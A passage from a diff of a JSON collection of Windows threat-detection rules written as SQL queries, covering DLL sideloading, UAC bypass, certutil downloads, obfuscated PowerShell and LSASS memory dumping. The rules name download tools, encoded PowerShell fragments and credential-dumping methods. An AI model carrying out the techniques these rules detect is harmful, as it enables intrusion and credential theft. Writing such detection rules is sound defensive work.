LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "status": "test", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "status": "experimental", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "status": "experimental", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Network administrator computer" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", 